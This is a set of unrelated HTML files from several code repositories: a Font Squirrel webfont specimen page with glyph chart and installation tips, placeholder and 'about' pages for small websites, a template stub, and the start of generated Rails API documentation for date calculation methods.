<p class="size20"><span>20.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="grid7">
<p class="size24"><span>24.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="black_blend"></div>
</div>
<div class="section psample fullreverse psample_row4" id="" style="border-bottom: 20px #000 solid;">
<div class="grid12 firstcol">
<p class="size30"><span>30.</span>Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.</p>
</div>
<div class="black_blend"></div>
</div>
</div>
<div id="layout">
<div class="section">
<div class="grid12 firstcol">
<h1>Lorem Ipsum Dolor</h1>
<h2>Etiam porta sem malesuada magna mollis euismod</h2>
<p class="byline">By <a href="#link">Aenean Lacinia</a></p>
</div>
</div>
<div class="section">
<div class="grid8 firstcol">
<p class="large">Donec sed odio dui. Morbi leo risus, porta ac consectetur ac, vestibulum at eros. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. </p>
<h3>Pellentesque ornare sem</h3>
<p>Maecenas sed diam eget risus varius blandit sit amet non magna. Maecenas faucibus mollis interdum. Donec ullamcorper nulla non metus auctor fringilla. Nullam id dolor id nibh ultricies vehicula ut id elit. Nullam id dolor id nibh ultricies vehicula ut id elit. </p>
<p>Aenean eu leo quam. Pellentesque ornare sem lacinia quam venenatis vestibulum. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. </p>
<p>Nulla vitae elit libero, a pharetra augue. Praesent commodo cursus magna, vel scelerisque nisl consectetur et. Aenean lacinia bibendum nulla sed consectetur. </p>
<p>Nullam quis risus eget urna mollis ornare vel eu leo. Nullam quis risus eget urna mollis ornare vel eu leo. Maecenas sed diam eget risus varius blandit sit amet non magna. Donec ullamcorper nulla non metus auctor fringilla. </p>
<h3>Cras mattis consectetur</h3>
<p>Aenean eu leo quam. Pellentesque ornare sem lacinia quam venenatis vestibulum. Aenean lacinia bibendum nulla sed consectetur. Integer posuere erat a ante venenatis dapibus posuere velit aliquet. Cras mattis consectetur purus sit amet fermentum. </p>
<p>Nullam id dolor id nibh ultricies vehicula ut id elit. Nullam quis risus eget urna mollis ornare vel eu leo. Cras mattis consectetur purus sit amet fermentum.</p>
</div>
<div class="grid4 sidebar">
<div class="box reverse">
<p class="last">Nullam quis risus eget urna mollis ornare vel eu leo. Donec ullamcorper nulla non metus auctor fringilla. Cras mattis consectetur purus sit amet fermentum. Sed posuere consectetur est at lobortis. Lorem ipsum dolor sit amet, consectetur adipiscing elit. </p>
</div>
<p class="caption">Maecenas sed diam eget risus varius.</p>
<p>Vestibulum id ligula porta felis euismod semper. Integer posuere erat a ante venenatis dapibus posuere velit aliquet. Vestibulum id ligula porta felis euismod semper. Sed posuere consectetur est at lobortis. Maecenas sed diam eget risus varius blandit sit amet non magna. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. </p>
<p>Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. Aenean lacinia bibendum nulla sed consectetur. Vivamus sagittis lacus vel augue laoreet rutrum faucibus dolor auctor. Aenean lacinia bibendum nulla sed consectetur. Nullam quis risus eget urna mollis ornare vel eu leo. </p>
<p>Praesent commodo cursus magna, vel scelerisque nisl consectetur et. Donec ullamcorper nulla non metus auctor fringilla. Maecenas faucibus mollis interdum. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. </p>
</div>
</div>
</div>
<div id="glyphs">
<div class="section">
<div class="grid12 firstcol">
<h1>Language Support</h1>
<p>The subset of Lovelo Black Regular in this kit supports the following languages:<br />
Albanian, Basque, Breton, Chamorro, Danish, Dutch, English, Faroese, Finnish, French, Frisian, Galician, Icelandic, Italian, Malagasy, Norwegian, Portuguese, Spanish, Swedish </p>
<h1>Glyph Chart</h1>
<p>The subset of Lovelo Black Regular in this kit includes all the glyphs listed below. Unicode entities are included above each glyph to help you insert individual characters into your layout.</p>
<div id="glyph_chart">
<div><p>&#32;</p> </div>
<div><p>&#33;</p>!</div>
<div><p>&#34;</p>"</div>
<div><p>&#36;</p>$</div>
<div><p>&#39;</p>'</div>
<div><p>&#44;</p>,</div>
<div><p>&#45;</p>-</div>
<div><p>&#46;</p>.</div>
<div><p>&#47;</p>/</div>
<div><p>&#48;</p>0</div>
<div><p>&#49;</p>1</div>
<div><p>&#50;</p>2</div>
<div><p>&#51;</p>3</div>
<div><p>&#52;</p>4</div>
<div><p>&#53;</p>5</div>
<div><p>&#54;</p>6</div>
<div><p>&#55;</p>7</div>
<div><p>&#56;</p>8</div>
<div><p>&#57;</p>9</div>
<div><p>&#58;</p>:</div>
<div><p>&#59;</p>;</div>
<div><p>&#63;</p>?</div>
<div><p>&#65;</p>A</div>
<div><p>&#66;</p>B</div>
<div><p>&#67;</p>C</div>
<div><p>&#68;</p>D</div>
<div><p>&#69;</p>E</div>
<div><p>&#70;</p>F</div>
<div><p>&#71;</p>G</div>
<div><p>&#72;</p>H</div>
<div><p>&#73;</p>I</div>
<div><p>&#74;</p>J</div>
<div><p>&#75;</p>K</div>
<div><p>&#76;</p>L</div>
<div><p>&#77;</p>M</div>
<div><p>&#78;</p>N</div>
<div><p>&#79;</p>O</div>
<div><p>&#80;</p>P</div>
<div><p>&#81;</p>Q</div>
<div><p>&#82;</p>R</div>
<div><p>&#83;</p>S</div>
<div><p>&#84;</p>T</div>
<div><p>&#85;</p>U</div>
<div><p>&#86;</p>V</div>
<div><p>&#87;</p>W</div>
<div><p>&#88;</p>X</div>
<div><p>&#89;</p>Y</div>
<div><p>&#90;</p>Z</div>
<div><p>&#96;</p>`</div>
<div><p>&#97;</p>a</div>
<div><p>&#98;</p>b</div>
<div><p>&#99;</p>c</div>
<div><p>&#100;</p>d</div>
<div><p>&#101;</p>e</div>
<div><p>&#102;</p>f</div>
<div><p>&#103;</p>g</div>
<div><p>&#104;</p>h</div>
<div><p>&#105;</p>i</div>
<div><p>&#106;</p>j</div>
<div><p>&#107;</p>k</div>
<div><p>&#108;</p>l</div>
<div><p>&#109;</p>m</div>
<div><p>&#110;</p>n</div>
<div><p>&#111;</p>o</div>
<div><p>&#112;</p>p</div>
<div><p>&#113;</p>q</div>
<div><p>&#114;</p>r</div>
<div><p>&#115;</p>s</div>
<div><p>&#116;</p>t</div>
<div><p>&#117;</p>u</div>
<div><p>&#118;</p>v</div>
<div><p>&#119;</p>w</div>
<div><p>&#120;</p>x</div>
<div><p>&#121;</p>y</div>
<div><p>&#122;</p>z</div>
<div><p>&#160;</p> </div>
<div><p>&#161;</p>¡</div>
<div><p>&#165;</p>¥</div>
<div><p>&#168;</p>¨</div>
<div><p>&#173;</p>­</div>
<div><p>&#175;</p>¯</div>
<div><p>&#180;</p>´</div>
<div><p>&#183;</p>·</div>
<div><p>&#184;</p>¸</div>
<div><p>&#191;</p>¿</div>
<div><p>&#192;</p>À</div>
<div><p>&#193;</p>Á</div>
<div><p>&#194;</p>Â</div>
<div><p>&#195;</p>Ã</div>
<div><p>&#196;</p>Ä</div>
<div><p>&#197;</p>Å</div>
<div><p>&#198;</p>Æ</div>
<div><p>&#199;</p>Ç</div>
<div><p>&#200;</p>È</div>
<div><p>&#201;</p>É</div>
<div><p>&#202;</p>Ê</div>
<div><p>&#203;</p>Ë</div>
<div><p>&#204;</p>Ì</div>
<div><p>&#205;</p>Í</div>
<div><p>&#206;</p>Î</div>
<div><p>&#207;</p>Ï</div>
<div><p>&#208;</p>Ð</div>
<div><p>&#209;</p>Ñ</div>
<div><p>&#210;</p>Ò</div>
<div><p>&#211;</p>Ó</div>
<div><p>&#212;</p>Ô</div>
<div><p>&#213;</p>Õ</div>
<div><p>&#214;</p>Ö</div>
<div><p>&#216;</p>Ø</div>
<div><p>&#217;</p>Ù</div>
<div><p>&#218;</p>Ú</div>
<div><p>&#219;</p>Û</div>
<div><p>&#220;</p>Ü</div>
<div><p>&#221;</p>Ý</div>
<div><p>&#222;</p>Þ</div>
<div><p>&#224;</p>à</div>
<div><p>&#225;</p>á</div>
<div><p>&#226;</p>â</div>
<div><p>&#227;</p>ã</div>
<div><p>&#228;</p>ä</div>
<div><p>&#229;</p>å</div>
<div><p>&#230;</p>æ</div>
<div><p>&#231;</p>ç</div>
<div><p>&#232;</p>è</div>
<div><p>&#233;</p>é</div>
<div><p>&#234;</p>ê</div>
<div><p>&#235;</p>ë</div>
<div><p>&#236;</p>ì</div>
<div><p>&#237;</p>í</div>
<div><p>&#238;</p>î</div>
<div><p>&#239;</p>ï</div>
<div><p>&#240;</p>ð</div>
<div><p>&#241;</p>ñ</div>
<div><p>&#242;</p>ò</div>
<div><p>&#243;</p>ó</div>
<div><p>&#244;</p>ô</div>
<div><p>&#245;</p>õ</div>
<div><p>&#246;</p>ö</div>
<div><p>&#248;</p>ø</div>
<div><p>&#249;</p>ù</div>
<div><p>&#250;</p>ú</div>
<div><p>&#251;</p>û</div>
<div><p>&#252;</p>ü</div>
<div><p>&#253;</p>ý</div>
<div><p>&#254;</p>þ</div>
<div><p>&#255;</p>ÿ</div>
<div><p>&#338;</p>Œ</div>
<div><p>&#339;</p>œ</div>
<div><p>&#376;</p>Ÿ</div>
<div><p>&#710;</p>ˆ</div>
<div><p>&#732;</p>˜</div>
<div><p>&#8192;</p> </div>
<div><p>&#8193;</p> </div>
<div><p>&#8194;</p> </div>
<div><p>&#8195;</p> </div>
<div><p>&#8196;</p> </div>
<div><p>&#8197;</p> </div>
<div><p>&#8198;</p> </div>
<div><p>&#8199;</p> </div>
<div><p>&#8200;</p> </div>
<div><p>&#8201;</p> </div>
<div><p>&#8202;</p> </div>
<div><p>&#8208;</p>‐</div>
<div><p>&#8209;</p>‑</div>
<div><p>&#8210;</p>‒</div>
<div><p>&#8211;</p>–</div>
<div><p>&#8212;</p>—</div>
<div><p>&#8216;</p>‘</div>
<div><p>&#8217;</p>’</div>
<div><p>&#8218;</p>‚</div>
<div><p>&#8220;</p>“</div>
<div><p>&#8221;</p>”</div>
<div><p>&#8222;</p>„</div>
<div><p>&#8226;</p>•</div>
<div><p>&#8230;</p>…</div>
<div><p>&#8239;</p> </div>
<div><p>&#8287;</p> </div>
<div><p>&#8364;</p>€</div>
<div><p>&#9724;</p>◼</div>
</div>
</div>
</div>
</div>
<div id="specs">
</div>
<div id="installing">
<div class="section">
<div class="grid7 firstcol">
<h1>Installing Webfonts</h1>
<p>Webfonts are supported by all major browser platforms but not all in the same way. There are currently four different font formats that must be included in order to target all browsers. This includes TTF, WOFF, EOT and SVG.</p>
<h2>1. Upload your webfonts</h2>
<p>You must upload your webfont kit to your website. They should be in or near the same directory as your CSS files.</p>
<h2>2. Include the webfont stylesheet</h2>
<p>A special CSS @font-face declaration helps the various browsers select the appropriate font it needs without causing you a bunch of headaches. Learn more about this syntax by reading the <a href="http://www.fontspring.com/blog/further-hardening-of-the-bulletproof-syntax">Fontspring blog post</a> about it. The code for it is as follows:</p>
<code>
@font-face{
font-family: 'MyWebFont';
src: url('WebFont.eot');
src: url('WebFont.eot?#iefix') format('embedded-opentype'),
url('WebFont.woff') format('woff'),
url('WebFont.ttf') format('truetype'),
url('WebFont.svg#webfont') format('svg');
}
</code>
<p>We've already gone ahead and generated the code for you. All you have to do is link to the stylesheet in your HTML, like this:</p>
<code><link rel="stylesheet" href="stylesheet.css" type="text/css" charset="utf-8" /></code>
<h2>3. Modify your own stylesheet</h2>
<p>To take advantage of your new fonts, you must tell your stylesheet to use them. Look at the original @font-face declaration above and find the property called "font-family." The name linked there will be what you use to reference the font. Prepend that webfont name to the font stack in the "font-family" property, inside the selector you want to change. For example:</p>
<code>p { font-family: 'WebFont', Arial, sans-serif; }</code>
<h2>4. Test</h2>
<p>Getting webfonts to work cross-browser <em>can</em> be tricky. Use the information in the sidebar to help you if you find that fonts aren't loading in a particular browser.</p>
</div>
<div class="grid5 sidebar">
<div class="box">
<h2>Troubleshooting<br />Font-Face Problems</h2>
<p>Having trouble getting your webfonts to load in your new website? Here are some tips to sort out what might be the problem.</p>
<h3>Fonts not showing in any browser</h3>
<p>This sounds like you need to work on the plumbing. You either did not upload the fonts to the correct directory, or you did not link the fonts properly in the CSS. If you've confirmed that all this is correct and you still have a problem, take a look at your .htaccess file and see if requests are getting intercepted.</p>
<h3>Fonts not loading in iPhone or iPad</h3>
<p>The most common problem here is that you are serving the fonts from an IIS server. IIS refuses to serve files that have unknown MIME types. If that is the case, you must set the MIME type for SVG to "image/svg+xml" in the server settings. Follow these instructions from Microsoft if you need help.</p>
<h3>Fonts not loading in Firefox</h3>
<p>The primary reason for this failure? You are still using a version Firefox older than 3.5. So upgrade already! If that isn't it, then you are very likely serving fonts from a different domain. Firefox requires that all font assets be served from the same domain. Lastly it is possible that you need to add WOFF to your list of MIME types (if you are serving via IIS.)</p>
<h3>Fonts not loading in IE</h3>
<p>Are you looking at Internet Explorer on an actual Windows machine or are you cheating by using a service like Adobe BrowserLab? Many of these screenshot services do not render @font-face for IE. Best to test it on a real machine.</p>
<h3>Fonts not loading in IE9</h3>
<p>IE9, like Firefox, requires that fonts be served from the same domain as the website. Make sure that is the case.</p>
</div>
</div>
</div>
</div>
</div>
<div id="footer">
<p>©2010-2011 Font Squirrel. All rights reserved.</p>
</div>
</div>
</body>
</html>
|
example/input/00001-about/00000-about.html | mortie/housecat | <!--author: mort@example.com (mort)
description: privacy breech
-->
<h1>About Me</h1>
<p>I'm a guy and/or gal. Lorem ipsum.</p>
|
ipol_demo-light-1025b85/app_available/46/template/input.html | juan-cardelino/matlab_demos | <%include file="header.html" />
<%include file="input_form_select.html" />
<%include file="footer.html" />
|
html/bottlecount.com/about.html | randomstring/Websites | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML><HEAD><TITLE>About BottleCount.Com</TITLE>
<META NAME="description" CONTENT="A free online wine cellar organizer.">
<META NAME="keywords" CONTENT="Wine, cellar, organizer, UPC scanning, easy, free">
<META NAME="copyright" CONTENT="Copyright 2000-2003 Bryn Dole">
<BASE TARGET="_top">
</HEAD><BODY bgcolor=#FFFFFF><CENTER>
<table bgcolor=black border=0 cellpadding=2 cellspacing=0 width=95%><tr><td>
<table bgcolor=#EEEEEE border=0 cellpadding=3 cellspacing=0 width=100%><tr>
<td align=left> <b>About BottleCount.Com</b></td>
<td align=right><a href="/index.html">Home</a></td>
</tr></table>
</td></tr></table>
<p>
<table bgcolor=black border=0 cellpadding=1 cellspacing=0 width=85%><tr><td>
<table bgcolor=#FFFFAA border=0 cellpadding=6 cellspacing=0 width=100%><tr><td align=left>
<b> 100 Bottles of Wine on the Wall...</b>
</td></tr></table>
</td></tr></table>
<table border=0 cellpadding=0 cellspacing=0 width=80%>
<tr><td colspan=2> </td></tr>
<tr><td><img src="images/vc200.jpg"> </td>
<td align="left">
<b>The problem we all want:</b><p>
Too much wine. Only it <b>is</b> a problem. After you have a few cases
stacked up it becomes really hard to find anything. If you're like me
you have one or two bottles from various wineries that you've visited,
all stuffed into the same box. BottleCount will help you find it. Then
there's all that tannic California Cabernet that you are planning to
hold back for a few years until it peaks. BottleCount will keep track
of when to drink it. Too lazy to bother taking tasting notes?
BottleCount lets you share tasting notes, so you know what other
people think of the wine as well.
<p>
</td></tr>
</table>
<p>
<table bgcolor=black border=0 cellpadding=1 cellspacing=0 width=85%><tr><td>
<table bgcolor=#FFFFAA border=0 cellpadding=6 cellspacing=0 width=100%><tr><td align=left>
<b> The Lush Behind the Scenes</b>
</td></tr></table>
</td></tr></table>
<table border=0 cellpadding=0 cellspacing=0 width=80%>
<tr><td colspan=2> </td></tr>
<tr><td><img src="images/Bryn_Dole_with_wine.jpg"> </td>
<td>
Hi! I'm <a href="http://www.bryndole.com/">Bryn Dole</a>. I wrote
BottleCount in my spare time to organize my growing wine collection.
Until recently I was working at <a href="http://www.topix.com/">Topix</a>,
specializing in <a href="http://www.topix.net/localnews">local news</a>.
My experience creating and working on the <a href="http://dmoz.org/">Open
Directory Project</a> has given me a good understanding of how
to build easy to use, online, applications. I drew on that experience
to create BottleCount.
<p>
Here are some <a href="/Useful.html">useful wine links.</a>
</td></tr>
</table>
<p>
<table bgcolor=black border=0 cellpadding=1 cellspacing=0 width=85%><tr><td>
<table bgcolor=#FFFFAA border=0 cellpadding=6 cellspacing=0 width=100%><tr><td align=left>
<b> Join The Fun</b>
</td></tr></table>
</td></tr></table>
<table border=0 cellpadding=0 cellspacing=0 width=80%><tr>
<td> </td></tr>
<tr><td>
Joining is easy, just click the <a href="/join.html">link</a>, fill
out the form, and you are in like Flynn.
<p>
To get an idea of what's going on at BottleCount, check out the
<a href="/top50.html">top 25</a> users of BottleCount, the
<a href="/FavoriteWines.html">most popular wines</a>, and the
<a href="/FavoriteWineries.html">most popular wineries</a>. For a complete list
of active BottleCount users <a href="/users.html">look here.</a>
</td></tr></table>
<p>
<table bgcolor=#000000 border=0 cellpadding=2 cellspacing=0 width=95%><tr><td>
<table bgcolor=#EEEEEE border=0 cellpadding=3 cellspacing=0 width=100%><tr>
<td align=left> </td><td align=right>
<a href="/cgi-bin/feedback.cgi?where=about">Submit Feedback</a> | <a href="/join.html">Join</a> | <a href="http://www.bottlecount.com/cgi-bin/login.cgi">Login</a>
</td></tr></table>
</td></tr></table>
</center></BODY></HTML>
|
doc/api/classes/DateAndTime/Calculations.html | aaronfi/chess-es6-demo | <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>DateAndTime::Calculations</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" href="../../css/reset.css" type="text/css" media="screen" />
<link rel="stylesheet" href="../../css/main.css" type="text/css" media="screen" />
<link rel="stylesheet" href="../../css/github.css" type="text/css" media="screen" />
<script src="../../js/jquery-1.3.2.min.js" type="text/javascript" charset="utf-8"></script>
<script src="../../js/jquery-effect.js" type="text/javascript" charset="utf-8"></script>
<script src="../../js/main.js" type="text/javascript" charset="utf-8"></script>
<script src="../../js/highlight.pack.js" type="text/javascript" charset="utf-8"></script>
</head>
<body>
<div class="banner">
<span>Ruby on Rails 4.0.0</span><br />
<h1>
<span class="type">Module</span>
DateAndTime::Calculations
</h1>
<ul class="files">
<li><a href="../../files/Users/aaron/_rvm/gems/ruby-2_0_0-head/gems/activesupport-4_0_0/lib/active_support/core_ext/date_and_time/calculations_rb.html">/Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb</a></li>
</ul>
</div>
<div id="bodyContent">
<div id="content">
<!-- Method ref -->
<div class="sectiontitle">Methods</div>
<dl class="methods">
<dt>A</dt>
<dd>
<ul>
<li>
<a href="#method-i-at_beginning_of_month">at_beginning_of_month</a>,
</li>
<li>
<a href="#method-i-at_beginning_of_quarter">at_beginning_of_quarter</a>,
</li>
<li>
<a href="#method-i-at_beginning_of_week">at_beginning_of_week</a>,
</li>
<li>
<a href="#method-i-at_beginning_of_year">at_beginning_of_year</a>,
</li>
<li>
<a href="#method-i-at_end_of_month">at_end_of_month</a>,
</li>
<li>
<a href="#method-i-at_end_of_quarter">at_end_of_quarter</a>,
</li>
<li>
<a href="#method-i-at_end_of_week">at_end_of_week</a>,
</li>
<li>
<a href="#method-i-at_end_of_year">at_end_of_year</a>
</li>
</ul>
</dd>
<dt>B</dt>
<dd>
<ul>
<li>
<a href="#method-i-beginning_of_month">beginning_of_month</a>,
</li>
<li>
<a href="#method-i-beginning_of_quarter">beginning_of_quarter</a>,
</li>
<li>
<a href="#method-i-beginning_of_week">beginning_of_week</a>,
</li>
<li>
<a href="#method-i-beginning_of_year">beginning_of_year</a>
</li>
</ul>
</dd>
<dt>D</dt>
<dd>
<ul>
<li>
<a href="#method-i-days_ago">days_ago</a>,
</li>
<li>
<a href="#method-i-days_since">days_since</a>,
</li>
<li>
<a href="#method-i-days_to_week_start">days_to_week_start</a>
</li>
</ul>
</dd>
<dt>E</dt>
<dd>
<ul>
<li>
<a href="#method-i-end_of_month">end_of_month</a>,
</li>
<li>
<a href="#method-i-end_of_quarter">end_of_quarter</a>,
</li>
<li>
<a href="#method-i-end_of_week">end_of_week</a>,
</li>
<li>
<a href="#method-i-end_of_year">end_of_year</a>
</li>
</ul>
</dd>
<dt>F</dt>
<dd>
<ul>
<li>
<a href="#method-i-future-3F">future?</a>
</li>
</ul>
</dd>
<dt>L</dt>
<dd>
<ul>
<li>
<a href="#method-i-last_month">last_month</a>,
</li>
<li>
<a href="#method-i-last_quarter">last_quarter</a>,
</li>
<li>
<a href="#method-i-last_week">last_week</a>,
</li>
<li>
<a href="#method-i-last_year">last_year</a>
</li>
</ul>
</dd>
<dt>M</dt>
<dd>
<ul>
<li>
<a href="#method-i-monday">monday</a>,
</li>
<li>
<a href="#method-i-months_ago">months_ago</a>,
</li>
<li>
<a href="#method-i-months_since">months_since</a>
</li>
</ul>
</dd>
<dt>N</dt>
<dd>
<ul>
<li>
<a href="#method-i-next_month">next_month</a>,
</li>
<li>
<a href="#method-i-next_quarter">next_quarter</a>,
</li>
<li>
<a href="#method-i-next_week">next_week</a>,
</li>
<li>
<a href="#method-i-next_year">next_year</a>
</li>
</ul>
</dd>
<dt>P</dt>
<dd>
<ul>
<li>
<a href="#method-i-past-3F">past?</a>,
</li>
<li>
<a href="#method-i-prev_month">prev_month</a>,
</li>
<li>
<a href="#method-i-prev_quarter">prev_quarter</a>,
</li>
<li>
<a href="#method-i-prev_week">prev_week</a>,
</li>
<li>
<a href="#method-i-prev_year">prev_year</a>
</li>
</ul>
</dd>
<dt>S</dt>
<dd>
<ul>
<li>
<a href="#method-i-sunday">sunday</a>
</li>
</ul>
</dd>
<dt>T</dt>
<dd>
<ul>
<li>
<a href="#method-i-today-3F">today?</a>,
</li>
<li>
<a href="#method-i-tomorrow">tomorrow</a>
</li>
</ul>
</dd>
<dt>W</dt>
<dd>
<ul>
<li>
<a href="#method-i-weeks_ago">weeks_ago</a>,
</li>
<li>
<a href="#method-i-weeks_since">weeks_since</a>
</li>
</ul>
</dd>
<dt>Y</dt>
<dd>
<ul>
<li>
<a href="#method-i-years_ago">years_ago</a>,
</li>
<li>
<a href="#method-i-years_since">years_since</a>,
</li>
<li>
<a href="#method-i-yesterday">yesterday</a>
</li>
</ul>
</dd>
</dl>
<!-- Section constants -->
<div class="sectiontitle">Constants</div>
<table border='0' cellpadding='5'>
<tr valign='top'>
<td class="attr-name">DAYS_INTO_WEEK</td>
<td>=</td>
<td class="attr-value">{
:monday => 0,
:tuesday => 1,
:wednesday => 2,
:thursday => 3,
:friday => 4,
:saturday => 5,
:sunday => 6
}</td>
</tr>
<tr valign='top'>
<td> </td>
<td colspan="2" class="attr-desc"></td>
</tr>
</table>
<!-- Methods -->
<div class="sectiontitle">Instance Public methods</div>
<div class="method">
<div class="title method-title" id="method-i-at_beginning_of_month">
<b>at_beginning_of_month</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-at_beginning_of_month" name="method-i-at_beginning_of_month" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-at_beginning_of_quarter">
<b>at_beginning_of_quarter</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-at_beginning_of_quarter" name="method-i-at_beginning_of_quarter" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-at_beginning_of_week">
<b>at_beginning_of_week</b>(start_day = Date.beginning_of_week)
<a href="../../classes/DateAndTime/Calculations.html#method-i-at_beginning_of_week" name="method-i-at_beginning_of_week" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-at_beginning_of_year">
<b>at_beginning_of_year</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-at_beginning_of_year" name="method-i-at_beginning_of_year" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-at_end_of_month">
<b>at_end_of_month</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-at_end_of_month" name="method-i-at_end_of_month" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-at_end_of_quarter">
<b>at_end_of_quarter</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-at_end_of_quarter" name="method-i-at_end_of_quarter" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-at_end_of_week">
<b>at_end_of_week</b>(start_day = Date.beginning_of_week)
<a href="../../classes/DateAndTime/Calculations.html#method-i-at_end_of_week" name="method-i-at_end_of_week" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-at_end_of_year">
<b>at_end_of_year</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-at_end_of_year" name="method-i-at_end_of_year" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-beginning_of_month">
<b>beginning_of_month</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-beginning_of_month" name="method-i-beginning_of_month" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time at the start of the month. <a
href="../DateTime.html">DateTime</a> objects will have a time set to 0:00.</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-at_beginning_of_month">at_beginning_of_month</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-beginning_of_month_source')" id="l_method-i-beginning_of_month_source">show</a>
</p>
<div id="method-i-beginning_of_month_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 80</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">beginning_of_month</span>
<span class="ruby-identifier">first_hour</span>{ <span class="ruby-identifier">change</span>(<span class="ruby-value">:day</span> =<span class="ruby-operator">></span> <span class="ruby-number">1</span>) }
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-beginning_of_quarter">
<b>beginning_of_quarter</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-beginning_of_quarter" name="method-i-beginning_of_quarter" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time at the start of the quarter. Example: 1st January,
1st July, 1st October. <a href="../DateTime.html">DateTime</a> objects will
have a time set to 0:00.</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-at_beginning_of_quarter">at_beginning_of_quarter</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-beginning_of_quarter_source')" id="l_method-i-beginning_of_quarter_source">show</a>
</p>
<div id="method-i-beginning_of_quarter_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 88</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">beginning_of_quarter</span>
<span class="ruby-identifier">first_quarter_month</span> = [<span class="ruby-number">10</span>, <span class="ruby-number">7</span>, <span class="ruby-number">4</span>, <span class="ruby-number">1</span>].<span class="ruby-identifier">detect</span> { <span class="ruby-operator">|</span><span class="ruby-identifier">m</span><span class="ruby-operator">|</span> <span class="ruby-identifier">m</span> <span class="ruby-operator"><=</span> <span class="ruby-identifier">month</span> }
<span class="ruby-identifier">beginning_of_month</span>.<span class="ruby-identifier">change</span>(<span class="ruby-value">:month</span> =<span class="ruby-operator">></span> <span class="ruby-identifier">first_quarter_month</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-beginning_of_week">
<b>beginning_of_week</b>(start_day = Date.beginning_of_week)
<a href="../../classes/DateAndTime/Calculations.html#method-i-beginning_of_week" name="method-i-beginning_of_week" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time representing the start of this week on the given
day. Week is assumed to start on <code>start_day</code>, default is
<code>Date.beginning_of_week</code> or
<code>config.beginning_of_week</code> when set. <code>DateTime</code>
objects have their time set to 0:00.</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-at_beginning_of_week">at_beginning_of_week</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-beginning_of_week_source')" id="l_method-i-beginning_of_week_source">show</a>
</p>
<div id="method-i-beginning_of_week_source" class="dyn-source">
